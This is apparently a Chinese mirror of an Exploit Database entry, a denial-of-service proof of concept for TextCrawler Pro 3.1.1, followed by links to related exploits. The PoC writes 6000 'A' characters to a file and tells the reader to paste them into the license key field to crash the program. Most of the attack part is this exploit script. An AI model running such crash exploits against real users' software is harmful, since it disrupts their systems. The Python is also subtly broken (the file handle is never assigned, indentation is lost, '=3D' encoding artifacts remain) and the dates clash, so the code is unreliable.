TextCrawler Pro3.1.1 – Denial of Service (PoC)

Exploit Database
13 阅读

作者： stresser

日期： 2020-01-06
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/47862/

# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
# Date: 2020-05-01
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
# Software Link:https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
# Exploit Author: Achilles
# Tested Version: 3.1.1
# Tested on: Windows 7 x64


# 1.- Run python code :TextCrawler.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open TextCrawler Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.



#!/usr/bin/env python
buffer =3D "\x41" * 6000

try:
open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

last Exploits
TextCrawler Pro3.1.1 – Denial of Service (PoC)的更多信息

Microsoft DirectWrite / AFDKO – Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray：
Microsoft Windows – ‘win32k.sys’ TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)：
AbsoluteTelnet 10.16 – ‘License name’ Denial of Service (PoC)：
Gnome Nautilus 3.16 – Denial of Service：
Sticky Notes & Color Widgets 1.4.2 – Denial of Service (PoC)：
Adobe Digital Editions 4.5.0 – ‘.pdf’ Critical Memory Corruption：
ACME micro_httpd – Denial of Service：
Qt 4.6.3 – ‘QTextEngine::LayoutData::reallocate()’ Memory Corruption：